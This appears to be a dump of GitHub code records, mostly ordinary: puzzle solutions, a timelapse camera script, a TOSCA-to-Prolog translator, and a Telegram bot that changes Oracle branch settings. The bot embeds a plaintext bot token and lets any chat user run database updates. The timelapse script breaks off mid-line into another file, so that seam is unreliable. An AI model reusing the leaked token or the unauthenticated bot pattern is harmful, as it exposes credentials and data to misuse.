detections\n for i, det in enumerate(pred): # detections per image\n p, s, im0 = Path(path), '', im0s\n\n gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh\n if len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n \n print('%.2f' % (conf))\n \n print('%sDone. 
(%.3fs)' % (s, t2 - t1))\n\n return conf\n\n","repo_name":"alkselsv/sensor-detector","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41220623005","text":"class Solution:\n def maxAreaOfIsland(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n m = len(grid)\n n = len(grid[0])\n\n def getarea(i, j):\n if 0 <= i < m and 0 <= j < n and grid[i][j] == 1:\n grid[i][j] = 0\n return 1 + getarea(i - 1, j) + getarea(i, j + 1) + getarea(i + 1, j) + getarea(i, j - 1)\n return 0\n\n max_area = 0\n for i in range(m):\n for j in range(n):\n if grid[i][j]:\n max_area = max(max_area, getarea(i, j))\n \n return max_area","repo_name":"aa4life/LeetCode","sub_path":"695 Max Area of Island/695 Max Area of Island.py","file_name":"695 Max Area of Island.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70587290474","text":"import telebot\nimport cx_Oracle\n\nhost = 'x'\nservico = 'x'\nusuario = 'x'\nsenha = 'x'\n\n# Encontra o arquivo que aponta para o banco de dados\ncx_Oracle.init_oracle_client(lib_dir=\"./instantclient_21_10\")\n\n# Faz a conexão ao banco de dados\nconecta_banco = cx_Oracle.connect(usuario, senha, f'{host}/{servico}')\n\n# Cria um cursor no banco para que seja possível fazer consultas e alterações no banco de dados\ncursor = conecta_banco.cursor()\n\n# Este token é específico do bot criado\nTOKEN = '6418781436:AAE8hyxEjX-TjZec0ghGQVArNXAv6Vulcaw'\n\n# Crie uma instância do bot\nbot = telebot.TeleBot(TOKEN)\n\n# Comando /6cd\n@bot.message_handler(commands=['6cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 6')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 6 configurada como CD.\")\n\n# Comando /6loja\n@bot.message_handler(commands=['6loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 6')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 6 configurada como LOJA.\")\n \n# Comando /3cd\n@bot.message_handler(commands=['3cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 3')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 3 configurada como CD.\")\n \n# Comando /3loja\n@bot.message_handler(commands=['3loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 3')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 3 configurada como LOJA.\")\n \n# Comando /4cd\n@bot.message_handler(commands=['4cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 4')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 4 configurada como CD.\")\n \n# Comando /4loja\n@bot.message_handler(commands=['4loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 4')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 4 configurada como LOJA.\")\n \n# Comando /5cd\n@bot.message_handler(commands=['5cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 5')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 5 configurada como CD.\")\n \n# Comando /5loja\n@bot.message_handler(commands=['5loja'])\ndef cd6(message):\n 
cursor.execute('update pcfilial set tipofilial = 2 where codigo = 5')\n    cursor.execute('commit')\n    bot.send_message(message.chat.id, \"Filial 5 configurada como LOJA.\")\n    \n# Command /20cd\n@bot.message_handler(commands=['20cd'])\ndef cd6(message):\n    cursor.execute('update pcfilial set tipofilial = 1 where codigo = 20')\n    cursor.execute('commit')\n    bot.send_message(message.chat.id, \"Filial 20 configurada como CD.\")\n    \n# Command /20loja\n@bot.message_handler(commands=['20loja'])\ndef cd6(message):\n    cursor.execute('update pcfilial set tipofilial = 2 where codigo = 20')\n    cursor.execute('commit')\n    bot.send_message(message.chat.id, \"Filial 20 configurada como LOJA.\")\n    \n# Command /70cd\n@bot.message_handler(commands=['70cd'])\ndef cd6(message):\n    cursor.execute('update pcfilial set tipofilial = 1 where codigo = 70')\n    cursor.execute('commit')\n    bot.send_message(message.chat.id, \"Filial 70 configurada como CD.\")\n    \n# Command /70loja\n@bot.message_handler(commands=['70loja'])\ndef cd6(message):\n    cursor.execute('update pcfilial set tipofilial = 2 where codigo = 70')\n    cursor.execute('commit')\n    bot.send_message(message.chat.id, \"Filial 70 configurada como LOJA.\")\n\n# Command /start\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n    bot.send_message(message.chat.id, \"Bot iniciado. Digite /help para ver os comandos.\")\n\n# Command /help\n@bot.message_handler(commands=['help'])\ndef handle_help(message):\n    bot.send_message(message.chat.id, \"Aqui estão os comandos disponíveis:\\n\\n\"\n                                      \"O comando consiste em digitar / seguido do número da filial e o tipo, se Loja ou CD \\n\"\n                                      \"Exemplos: /6loja /4cd /20loja \\n\"\n                                      \"/start - Iniciar o bot\\n\"\n                                      \"/help - Exibir esta mensagem de ajuda\\n\"\n                                      \"/info - Exibir informações do usuário\")\n\n# Command /info\n@bot.message_handler(commands=['info'])\ndef handle_info(message):\n    user = message.from_user\n    bot.send_message(message.chat.id, f\"Nome: {user.first_name}\\n\"\n                                      f\"Sobrenome: {user.last_name}\\n\"\n                                      f\"ID do usuário: {user.id}\")\n\n# Handle text messages that are not commands\n@bot.message_handler(func=lambda message: True)\ndef handle_text(message):\n    bot.send_message(message.chat.id, \"Comando inexistente. Digite /help para ver os comandos disponíveis.\")\n\n# Start the bot\nif __name__ == \"__main__\":\n    bot.polling(none_stop=True)\n","repo_name":"Sipauba/altera-tipo-filial-via-telegram","sub_path":"altera-filial.py","file_name":"altera-filial.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"69813069994","text":"n , m = map(int, input().split())\nmp = [ [*map(int, input().split())] for _ in range(n)]\n\ndp = [ [0]* m for _ in range(n)]\nfor i in range(n):\n    s = 0\n    for j in range(m):\n        if i:\n            dp[i][j] += dp[i-1][j]\n        dp[i][j] += mp[i][j] + s\n        s += mp[i][j]\n\n#print(*dp , sep = '\\n')\nk = int(input())\nfor _ in range(k):\n    a , b , c , d = [int(i)-1 for i in input().split()]\n    ans = dp[c][d]\n    if a:\n        ans -= dp[a-1][d]\n    if b:\n        ans -= dp[c][b-1]\n    if a and b:\n        ans += dp[a-1][b-1]\n    print(ans)\n","repo_name":"JannaKim/PS","sub_path":"dp/15724_주지수.py","file_name":"15724_주지수.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4311821825","text":"#!/usr/bin/env python\n\n# script_timelapse : t.blandin. This script is based on the example \n# developed by Jim Easterbrook for the python-gphoto2 lib. 
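
The bot record above registers a dozen near-identical handlers, all sharing the function name cd6. A hedged sketch of one parameterized handler that covers every /<branch><cd|loja> command follows; it reuses the bot, cursor, and conecta_banco objects defined in that script, and the bind-variable style is an assumption, not taken from the source:

import re

FILIAL_CMD = re.compile(r'/(\d+)(cd|loja)')

@bot.message_handler(func=lambda m: bool(m.text) and FILIAL_CMD.fullmatch(m.text.strip()) is not None)
def handle_filial(message):
    # One handler for all branch/type pairs instead of one function per command.
    codigo, kind = FILIAL_CMD.fullmatch(message.text.strip()).groups()
    tipo = 1 if kind == 'cd' else 2
    cursor.execute('update pcfilial set tipofilial = :tipo where codigo = :codigo',
                   {'tipo': tipo, 'codigo': int(codigo)})
    conecta_banco.commit()
    bot.send_message(message.chat.id,
                     'Filial {} configurada como {}.'.format(codigo, kind.upper()))
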
\n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nfrom contextlib import contextmanager\nimport logging\nimport os\nimport subprocess\nimport sys\nimport time\n\nimport gphoto2 as gp\n# Variables\nINTERVAL = 10.0 #in second\nWORK_DIR = '/tmp/timelapse'\nOUT_FILE = 'timelapse.mp4'\nNB_SHOTS = 10\narchive = 'timelapse.7z'\n\n\n\n\n#Configure camera for use\n@contextmanager\ndef configured_camera():\n # initialise camera\n camera = gp.Camera()\n camera.init()\n try:\n # adjust camera settings\n config = camera.get_config()\n capturetarget_conf = config.get_child_by_name('capturetarget')\n capturetarget = capturetarget_conf.get_value()\n capturetarget_conf.set_value('Internal RAM')\n # image version\n imageformat_conf = config.get_child_by_name('imagequality')\n imageformat = imageformat_conf.get_value()\n imageformat_conf.set_value('JPEG Normal')\n # flash off\n flashmode_conf = config.get_child_by_name('flashmode')\n flashmode = flashmode_conf.get_value()\n flashmode_conf.set_value('Flash off')\n # We want to add the intersting settings here\n imagesize_conf=config.get_child_by_name('imagesize')\n imagesize=imagesize_conf.get_value()\n imagesize_conf.set_value('1936x1296')\n # End of the custom settings\n camera.set_config(config)\n # use camera\n yield camera\n finally:\n # reset configuration\n capturetarget_conf.set_value(capturetarget)\n imageformat_conf.set_value(imageformat)\n flashmode_conf.set_value(flashmode)\n imagesize_conf.set_value(imagesize)\n # DON'T FORGET TO RESET THE SETTINGS YOU MODIFY\n camera.set_config(config)\n camera.exit()\n\ndef empty_camera_queue(camera):\n type_ , data = camera.wait_for_event(10)\n while not type_ == gp.GP_EVENT_TIMEOUT :\n type_ , data = camera.wait_for_event(10)\n if type_ == gp.GP_EVENT_FILE_ADDED :\n # Ho no, we have a problem with our imageformat\n print(\"Unexpected new file\", data.folder + data.name)\n return\n\ndef main():\n # settings de logging, usefull for debug\n logging.basicConfig(\n format='%(levelname)s: %(name)s: %(message)s', level=logging.WARNING)\n callback_obj = gp.check_result(gp.use_python_logging())\n if not os.path.exists(WORK_DIR) : \n os.makedirs(WORK_DIR)\n template = os.path.join(WORK_DIR, 'frame%04d.jpg')\n next_shot=time.time()+5.0\n count = 0\n with configured_camera() as camera :\n while count<=NB_SHOTS :\n try :\n empty_camera_queue(camera)\n while time.time() -12 kg\n\n Args:\n cardinal: CardinalFst\n decimal: DecimalFst\n \"\"\"\n\n def __init__(self, cardinal: GraphFst, decimal: GraphFst):\n super().__init__(name=\"measure\", kind=\"verbalize\")\n optional_sign = pynini.closure(pynini.cross(\"negative: \\\"true\\\"\", \"-\"), 0, 1)\n unit = (\n pynutil.delete(\"units:\")\n + delete_space\n + pynutil.delete(\"\\\"\")\n + pynini.closure(NEMO_CHAR - \" \", 1)\n + pynutil.delete(\"\\\"\")\n + delete_space\n )\n graph_decimal = (\n optional_sign\n + delete_space\n + decimal.numbers\n )\n graph_cardinal = (\n optional_sign\n + delete_space\n + 
cardinal.numbers\n\n )\n graph = (graph_cardinal | graph_decimal) + delete_space + pynutil.insert(\" \") + unit\n delete_tokens = self.delete_tokens(graph)\n self.fst = delete_tokens.optimize()\n","repo_name":"lociko/ukraine_itn_wfst","sub_path":"ukr/verbalizers/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"9499438224","text":"import re\nfrom typing import Tuple\nimport pyswip\n\nvar_re = re.compile(r\"\\$[a-z][A-Za-z0-9_]*\")\n\ndef get_unique_int() -> int:\n get_unique_int.counter += 1\n return get_unique_int.counter\nget_unique_int.counter = -1\n\n\ndef capitalize_first(s: str) -> str:\n if not s:\n return s\n else:\n return s[0].upper() + s[1:]\n\n\ndef is_var(s: str) -> bool:\n return var_re.fullmatch(s) is not None\n\n\ndef atom_or_var(s: str, delimiter=\"'\") -> str:\n if is_var(s):\n return capitalize_first(s[1:])\n elif s == \"$_\":\n return \"_\"\n else:\n return delimiter + s + delimiter\n\n\ndef get_vars_from_str(s: str) -> dict[str, str]:\n global var_re\n return {m: atom_or_var(m) for m in var_re.findall(s)}\n\n\ndef build_check_pred(check_yaml) -> Tuple[str, str, dict[str, str], str]:\n name = check_yaml[\"name\"]\n description = check_yaml[\"description\"]\n formula = check_yaml[\"check\"]\n ext_vars_dict = get_vars_from_str(description)\n ext_vars = list(ext_vars_dict.values())\n header = f\"{name}({', '.join(ext_vars)})\"\n return header, description, ext_vars_dict, f\"{header} :- {build_formula_term(formula)}\"\n\n\ndef build_term(term) -> str:\n if type(term) is str:\n return atom_or_var(term)\n elif type(term) is list:\n return \"[\" + \", \".join(build_term(t) for t in term) + \"]\"\n elif type(term) is dict:\n assert len(term) == 1, \"Dict term can only have one key\"\n root = list(term)[0]\n assert type(term[root]) is dict \\\n and \"args\" in term[root] \\\n and type(term[root][\"args\"]) is list, \\\n \"Dict term must have an 'args' key with the list of \" \\\n + \"the arguments of the term\"\n return root + \"(\" + \", \".join(build_term(t) for t in term[root][\"args\"]) + \")\"\n else:\n return str(term)\n\n\ndef build_node_pred(node) -> str:\n node_struct_err = \"\"\"Node must have structure:\n :\n [type: ]\n [properties: | $var]\n [capabilities: | $var]\n [requirements: | $var]\"\"\"\n \n assert type(node) is dict and len(node) == 1, node_struct_err\n root = list(node)[0]\n node_name = atom_or_var(root)\n assert type(node[root]) is dict, node_struct_err\n node_type = atom_or_var(node[root].get(\"type\", \"$_\"))\n node_int = get_unique_int()\n\n def build_props_list(props_dict) -> list[str]:\n res = []\n for pname, pval in props_dict.items():\n pname = atom_or_var(pname)\n if type(pval) is str:\n pval = atom_or_var(pval, delimiter='\"')\n res.append(f\"property({pname}, {pval})\")\n return res\n\n props_list = []\n props_var = \"_\"\n if \"properties\" in node[root]:\n if type(node[root][\"properties\"]) is str and is_var(node[root][\"properties\"]):\n props_var = atom_or_var(node[root][\"properties\"])\n else:\n props_var = f\"Props{node_int}\"\n props_list = build_props_list(node[root][\"properties\"])\n \n caps_list = []\n caps_var = \"_\"\n if \"capabilities\" in node[root]:\n if type(node[root][\"capabilities\"]) is str and is_var(node[root][\"capabilities\"]):\n caps_var = atom_or_var(node[root][\"capabilities\"])\n else:\n caps_var = f\"Caps{node_int}\"\n for cname, cdict in 
node[root][\"capabilities\"].items():\n cname = atom_or_var(cname)\n assert \"properties\" in cdict, \"Capabilities in node should contain properties\"\n cprops_list = build_props_list(cdict[\"properties\"])\n caps_list.append(f\"capability({cname}, [{', '.join(cprops_list)}])\")\n\n reqs_list = []\n reqs_var = \"_\"\n if \"requirements\" in node[root]:\n if type(node[root][\"requirements\"]) is str and is_var(node[root][\"requirements\"]):\n reqs_var = atom_or_var(node[root][\"requirements\"])\n else:\n reqs_var = f\"Reqs{node_int}\"\n for req in node[root][\"requirements\"]:\n rname, rval = list(req.items())[0]\n rname = atom_or_var(rname)\n rval = atom_or_var(rval)\n reqs_list.append(f\"requirement({rname}, {rval})\")\n\n preds = [f\"node({node_name}, {node_type}, {props_var}, {caps_var}, {reqs_var})\"]\n if props_list:\n preds.append(f\"subset([{', '.join(props_list)}], {props_var})\")\n if caps_list:\n preds.append(f\"subset([{', '.join(caps_list)}], {caps_var})\")\n if reqs_list:\n preds.append(f\"subset([{', '.join(reqs_list)}], {reqs_var})\")\n return \", \".join(preds)\n\n\ndef build_typedef_props_list(props_dict) -> list[str]:\n res = []\n for pname, pdict in props_dict.items():\n requiredness = \"_\"\n if pdict.get(\"required\") is not None:\n requiredness = \"true\" if pdict[\"required\"] else \"false\"\n pname = atom_or_var(pname)\n ptype = atom_or_var(pdict.get(\"type\", \"$_\"))\n res.append(f\"property({pname}, {ptype}, {requiredness})\")\n return res\n\n\ndef build_node_type_pred(node_type) -> str:\n node_type_struct_err = \"\"\"Node type must have structure:\n :\n [derived_from: ]\n [properties: | $var]\n [capabilities: | $var]\n [requirements: | $var]\"\"\"\n \n assert type(node_type) is dict and len(node_type) == 1, node_type_struct_err\n root = list(node_type)[0]\n type_name = atom_or_var(root)\n assert type(node_type[root]) is dict, node_type_struct_err\n derived_from = atom_or_var(node_type[root].get(\"derived_from\", \"$_\"))\n type_int = get_unique_int()\n\n props_list = []\n props_var = \"_\"\n if \"properties\" in node_type[root]:\n if type(node_type[root][\"properties\"]) is str and is_var(node_type[root][\"properties\"]):\n props_var = atom_or_var(node_type[root][\"properties\"])\n else:\n props_var = f\"Props{type_int}\"\n props_list = build_typedef_props_list(node_type[root][\"properties\"])\n \n caps_list = []\n caps_var = \"_\"\n if \"capabilities\" in node_type[root]:\n if type(node_type[root][\"capabilities\"]) is str and is_var(node_type[root][\"capabilities\"]):\n caps_var = atom_or_var(node_type[root][\"capabilities\"])\n else:\n caps_var = f\"Caps{type_int}\"\n for cname, cdict in node_type[root][\"capabilities\"].items():\n assert list(cdict) == [\"type\"], \\\n \"Capability in node type must have exactly one key: 'type'.\"\n cname = atom_or_var(cname)\n ctype = atom_or_var(cdict[\"type\"])\n caps_list.append(f\"capability({cname}, {ctype})\")\n\n reqs_list = []\n reqs_var = \"_\"\n if \"requirements\" in node_type[root]:\n if type(node_type[root][\"requirements\"]) is str and is_var(node_type[root][\"requirements\"]):\n reqs_var = atom_or_var(node_type[root][\"requirements\"])\n else:\n reqs_var = f\"Reqs{type_int}\"\n for req in node_type[root][\"requirements\"]:\n rname, rdict = list(req.items())[0]\n rname = atom_or_var(rname)\n req_cap = atom_or_var(rdict.get(\"capability\", \"$_\"))\n req_node = atom_or_var(rdict.get(\"node\", \"$_\"))\n req_rel = atom_or_var(rdict.get(\"relationship\", \"$_\"))\n occ = rdict.get(\"occurrences\")\n if occ is 
None:\n req_occ = \"_\"\n elif type(occ) is str and is_var(occ):\n req_occ = atom_or_var(occ)\n else:\n occ_lb = occ[0]\n if type(occ_lb) is str and is_var(occ_lb):\n occ_lb = atom_or_var(occ_lb)\n occ_ub = occ[1]\n if type(occ_ub) is str and is_var(occ_ub):\n occ_ub = atom_or_var(occ_ub)\n elif occ_ub == \"UNBOUNDED\":\n occ_ub = \"unbounded\"\n req_occ = f\"occurrences({occ_lb}, {occ_ub})\"\n reqs_list.append(f\"requirement({rname}, {req_cap}, {req_node}, {req_rel}, {req_occ})\")\n preds = [f\"node_type({type_name}, {derived_from}, {props_var}, {caps_var}, {reqs_var})\"]\n if props_list:\n preds.append(f\"subset([{', '.join(props_list)}], {props_var})\")\n if caps_list:\n preds.append(f\"subset([{', '.join(caps_list)}], {caps_var})\")\n if reqs_list:\n preds.append(f\"subset([{', '.join(reqs_list)}], {reqs_var})\")\n return \", \".join(preds)\n\n\ndef build_cap_type_pred(cap_type) -> str:\n cap_type_struct_err = \"\"\"capability type must have structure:\n :\n [derived_from: ]\n [properties: | $var]\"\"\"\n \n assert type(cap_type) is dict and len(cap_type) == 1, cap_type_struct_err\n root = list(cap_type)[0]\n type_name = atom_or_var(root)\n assert type(cap_type[root]) is dict, cap_type_struct_err\n derived_from = atom_or_var(cap_type[root].get(\"derived_from\", \"$_\"))\n type_int = get_unique_int()\n\n props_list = []\n props_var = \"_\"\n if \"properties\" in cap_type[root]:\n if type(cap_type[root][\"properties\"]) is str and is_var(cap_type[root][\"properties\"]):\n props_var = atom_or_var(cap_type[root][\"properties\"])\n else:\n props_var = f\"Props{type_int}\"\n props_list = build_typedef_props_list(cap_type[root][\"properties\"])\n\n preds = [f\"cap_type({type_name}, {derived_from}, {props_var})\"]\n if props_list:\n preds.append(f\"subset([{', '.join(props_list)}], {props_var})\")\n return \", \".join(preds)\n\n\ndef build_policy_pred(pol) -> str:\n pol_struct_err = \"\"\"Node must have structure:\n :\n [type: ]\n [targets: [] | $var]\"\"\"\n\n assert type(pol) is dict and len(pol) == 1, pol_struct_err\n root = list(pol)[0]\n pol_name = atom_or_var(root)\n assert type(pol[root]) is dict, pol_struct_err\n pol_type = atom_or_var(pol[root].get(\"type\", \"$_\"))\n pol_int = get_unique_int()\n\n tgts_list = []\n tgts_var = \"_\"\n if \"targets\" in pol[root]:\n if type(pol[root][\"targets\"]) is str and is_var(pol[root][\"targets\"]):\n tgts_var = atom_or_var(pol[root][\"targets\"])\n else:\n tgts_var = f\"Tgts{pol_int}\"\n tgts_list = [atom_or_var(t) for t in pol[root][\"targets\"]]\n\n preds = [f\"policy({pol_name}, {pol_type}, {tgts_var})\"]\n if tgts_list:\n preds.append(f\"subset([{', '.join(tgts_list)}], {tgts_var})\")\n return \", \".join(preds)\n\n\ndef build_formula_term(formula) -> str:\n assert type(formula) is dict and len(formula) == 1, \\\n \"Every formula must be a dictionary with one key\"\n root = list(formula)[0]\n op_s = formula[root]\n if root == \"and\":\n assert type(op_s) is list, \"'and' connective requires a list of formulas\"\n return \", \".join(build_formula_term(op) for op in op_s)\n elif root == \"or\":\n assert type(op_s) is list, \"'or' connective requires a list of formulas\"\n return \"(\" + \"; \".join(build_formula_term(op) for op in op_s) + \")\"\n elif root == \"not\":\n return \"\\\\+ (\" + build_formula_term(op_s) + \")\"\n elif root == \"match\":\n assert type(op_s) is list and len(op_s) == 2, \"'match' requires two arguments\"\n return build_term(op_s[0]) + \" = \" + build_term(op_s[1])\n elif root == \"predicate\":\n assert type(op_s) is 
dict and len(op_s) == 1, \"'predicate' requires a single dict term\"\n return build_term(op_s)\n elif root == \"node\":\n return build_node_pred(op_s)\n elif root == \"node_type\":\n return build_node_type_pred(op_s)\n elif root == \"capability_type\":\n return build_cap_type_pred(op_s)\n elif root == \"policy\":\n return build_policy_pred(op_s)\n else:\n return \"unsupported\"\n\n\ndef fmt_result(res) -> str:\n if type(res) is pyswip.Atom:\n return res.value\n elif type(res) is list:\n return \"[\" + \", \".join([fmt_result(r) for r in res]) + \"]\"\n elif type(res) is bytes:\n return res.decode('UTF-8')\n else:\n return str(res)","repo_name":"mikidep/piacere-formal-verification","sub_path":"doml_tosca_poc/check2swipl.py","file_name":"check2swipl.py","file_ext":"py","file_size_in_byte":12197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10830122229","text":"import numpy as np\n\n\ndef searchOccupied(matrix, rows, cols, curr_row, curr_col, delta_row, delta_col):\n '''\n This function moves in the matrix in the direction given by the deltas:\n\n -1,-1 -1,0 -1,+1\n\n 0,-1 x 0,+1\n\n +1,-1 +1,0 +1,+1\n\n and returns 1 if the first seat it finds is a \"#\", otherwise 0\n\n '''\n search_row = curr_row + delta_row\n search_col = curr_col + delta_col\n\n while (search_row >= 0 and search_row < rows) and (search_col >= 0 and search_col < cols):\n if matrix[search_row][search_col] == \"#\":\n return 1\n elif matrix[search_row][search_col] == \"L\":\n return 0\n search_row += delta_row\n search_col += delta_col\n\n return 0\n\n\ndef newRound(old_matrix, rows, cols):\n newMatrix = np.copy(old_matrix)\n for cur_row in range(rows):\n for cur_col in range(cols):\n\n occupied_seats = 0\n for delta_row, delta_col in [[-1, -1], [-1, 0], [-1, +1], [0, -1], [0, +1], [+1, -1], [+1, 0], [+1, +1]]:\n occupied_seats += searchOccupied(matrix, rows, cols, cur_row, cur_col, delta_row, delta_col)\n\n if old_matrix[cur_row][cur_col] == \"L\":\n if occupied_seats == 0:\n newMatrix[cur_row][cur_col] = \"#\"\n elif old_matrix[cur_row][cur_col] == \"#\":\n if occupied_seats >= 5:\n newMatrix[cur_row][cur_col] = \"L\"\n\n return newMatrix\n\n\n''' Open file '''\nfilename = 'input.txt'\nwith open(filename) as f:\n content = f.readlines()\n\nrows = len(content)\n# Not counting the \\n\ncols = len(content[0]) - 1\n\nmatrix = np.array([])\nfor line_dirty in content:\n line = line_dirty.replace(\"\\n\", \"\")\n matrix = np.append(matrix, list(line))\nmatrix = matrix.reshape(rows, cols)\n\nnewMatrix = np.array([])\nwhile True:\n newMatrix = newRound(matrix, rows, cols)\n if (newMatrix == matrix).all():\n # This round didn't change the matrix\n break\n matrix = newMatrix.copy()\n\nmatrix_into_array = np.array(matrix).reshape(-1)\noccupied_seats = np.shape(np.where(matrix_into_array == \"#\"))[1]\n\nprint(\"There are \" + str(occupied_seats) + \" occupied seats\")","repo_name":"AndreaBruno97/AdventOfCode2020_python","sub_path":"day_11/puzzle_2.py","file_name":"puzzle_2.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41458289979","text":"#\n# @lc app=leetcode id=893 lang=python3\n#\n# [893] Groups of Special-Equivalent Strings\n#\n\n# @lc code=start\n\nfrom collections import Counter\n\n\nclass Solution:\n def numSpecialEquivGroups(self, words: List[str]) -> int:\n\n if not len(words):\n return 0\n\n result = set()\n\n for w in words:\n\n current = 
''.join(sorted(w[1::2])+sorted(w[::2]))\n result.add(current)\n\n return len(result)\n\n# @lc code=end\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2020/893.groups-of-special-equivalent-strings.py","file_name":"893.groups-of-special-equivalent-strings.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28412088476","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: A Tree\n @return: Preorder in ArrayList which contains node values.\n \"\"\"\n def preorderTraversal(self, root):\n # using current pointer \n current = root \n result, stack = [], []\n while len(stack) > 0 or current is not None:\n if current is not None:\n result.append(current.val)\n stack.append(current)\n current = current.left \n \n else:\n current = stack.pop()\n current = current.right \n \n return result\n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kunyi/Tree/binary_tree_preorder_traversal.py","file_name":"binary_tree_preorder_traversal.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8251929207","text":"# File: Chess.py\n\n# Description: Find the number of solutions to N-Queens problem.\n\n# Student Name: Alicia Ireland\n\n# Student UT EID: ani324\n\n# Partner Name:\n\n# Partner UT EID:\n\n# Course Name: CS 313E\n\n# Unique Number: 50845\n\n# Date Created: 10/22/2020\n\n# Date Last Modified:10/22/2020\nimport sys\n\nclass Queens (object):\n def __init__ (self, n):\n self.count = 0\n self.board = []\n self.n = n\n for i in range (self.n):\n row = []\n for j in range (self.n):\n row.append ('*')\n self.board.append (row)\n# check if a position on the board is valid\n def is_valid (self, row, col):\n for i in range (self.n):\n if (self.board[row][i] == 'Q') or (self.board[i][col] == 'Q'):\n return False\n for i in range (self.n):\n for j in range (self.n):\n row_diff = abs (row - i)\n col_diff = abs (col - j)\n if (row_diff == col_diff) and (self.board[i][j] == 'Q'):\n return False\n return True\n\n\n # do the recursive backtracking\n def recursive_solve (self, col):\n if (col == self.n):\n self.count += 1\n return\n else:\n for i in range (self.n):\n if (self.is_valid (i, col)):\n self.board[i][col] = 'Q'\n self.recursive_solve(col + 1)\n self.board[i][col] = '*' \n return self.count \ndef main():\n # read the size of the board\n line = sys.stdin.readline()\n line = line.strip()\n n = int (line)\n\n # create a chess board\n\n game = Queens (n)\n\n print(game.recursive_solve(0))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"alicianireland/CS313E","sub_path":"Chess.py","file_name":"Chess.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12371034924","text":"\"\"\"onlineadmin URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. 
Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\n\nfrom app import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\"\",views.Adminloginpage,name=\"admin\"),\n path(\"logindetails/\",views.logindetails,name=\"logindetails\"),\n path(\"merchentdetails/\",views.merchant,name=\"merchant\"),\n path(\"savemerchent/\",views.savemerchent,name=\"savemerchent\"),\n path(\"viewmerchent/\",views.viewmerchent,name=\"viewmerchent\"),\n path(\"delete/\",views.delete,name=\"delete\"),\n\n path('merchant/',views.Merchentlog.as_view()),\n path(\"addd/\",views.Productsave.as_view()),\n path(\"viewdata/\",views.Viewdata.as_view()),\n path('update//',views.Update.as_view()),\n path(\"saveupdate//\",views.Saveupdate.as_view()),\n path(\"deletee//\",views.Delete.as_view())\n]\n","repo_name":"yagnapravallika/onlinessalesapplication-merchantapplication","sub_path":"onlinesales/onlineadmin/onlineadmin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33618562049","text":"from flask import Flask, Blueprint, make_response\nfrom flask 